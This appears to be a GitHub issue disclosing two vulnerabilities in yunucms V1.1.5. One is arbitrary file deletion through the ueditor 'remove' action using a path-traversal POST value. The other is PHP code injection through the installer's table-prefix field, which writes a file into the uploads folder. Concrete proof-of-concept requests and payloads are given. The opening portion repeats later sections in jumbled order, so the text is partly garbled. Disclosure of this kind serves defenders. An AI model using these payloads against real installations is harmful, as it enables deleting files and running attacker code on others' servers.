In the remove() function shown above, the content of $_POST['key'] gets used in the call to unlink() without undergoing any authentication or sanitization.
2、Launch a new installation process to execute PHP code
After remove /data/install.lock ,remote attackers can Launch a new installation process.
The code section which made this vulnerability possible is found in the /statics/app/index/controller/Install.php file:
line 117-131
Use file_put_contents to wirte $arr into $file(config\database.php)
POC
In installation process setup2 ,we can input yunu_',].die(file_put_contents('uploads\image\f4ck.php','<?=phpinfo();?>'));$a=['a'=>' to 数据表前缀 DB_PREFIX
When finish installation process,we can get /data/database.php like this:
Two issue was discovered in yunucms V1.1.5。
1、Arbitrary File Deletion
2、Launch a new installation process to execute PHP code
1、There is a Arbitrary File Deletion attacks vulnerability which allows remote attackers to unlink any file
The code section which made this vulnerability possible is found in the /statics/ueditor/php/vendor/Local.class.php file:
line 34-68
In the remove() function shown above, the content of $_POST['key'] gets used in the call to unlink() without undergoing any authentication or sanitization.
POC
url:/statics/ueditor/php/controller.php?action=remove
POST: key=/uploads/../data/install.lock
/data/install.lock has been removed.
2、Launch a new installation process to execute PHP code
After remove /data/install.lock ,remote attackers can Launch a new installation process.
The code section which made this vulnerability possible is found in the /statics/app/index/controller/Install.php file:
line 117-131
Follow function setConfigfile(),in /app/admin/common.php file:
line 76-87
Use file_put_contents to wirte $arr into $file(config\database.php)
POC

In installation process setup2 ,we can input
yunu_',].die(file_put_contents('uploads\image\f4ck.php','<?=phpinfo();?>'));$a=['a'=>'to 数据表前缀 DB_PREFIXWhen finish installation process,we can get /data/database.php like this:

Visit homepage http://127.0.0.1:81,will create file /uploads/image/f4ck.php

The text was updated successfully, but these errors were encountered: